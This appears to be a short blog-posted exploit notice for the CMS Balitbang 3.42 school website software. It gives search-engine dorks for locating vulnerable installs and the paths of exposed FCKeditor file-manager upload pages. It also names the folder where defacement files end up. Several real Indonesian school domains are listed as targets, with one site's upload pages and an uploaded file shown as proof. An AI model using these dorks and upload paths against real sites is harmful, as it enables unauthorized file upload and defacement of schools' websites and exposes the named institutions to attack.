#[~] Author : the_cyber_nuxbie
#[~] Version: CMS Balitbang 3.42.
#[~] Link : http://www.kajianwebsite.org/download/CMS%203.42-17082010.rar
#[!] Dork : inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"
______________________________________________________________
#[~] Exploited:
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html
#[~] Directory:
http://public_html/userfiles/file/file-deface.txt
Setting:
"editor/filemanager/connectors/php/config.php"
- P.o.C:
1. Target:
Special Site:.sch.id (indonesian).
http://www.smpn2muarapinang.sch.id
http://www.sman1gombong.sch.id
http://www.smpn13bdg.sch.id
http://www.pesantrenkrapyak.sch.id
http://www.smkkr2tomohon.sch.id
2. http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
http://www.sman1gombong.sch.id/editor/filemanager/connectors/uploadtest.html
3 http://www.sman1gombong.sch.id/userfiles/CBS.txt
Tidak ada komentar:
Posting Komentar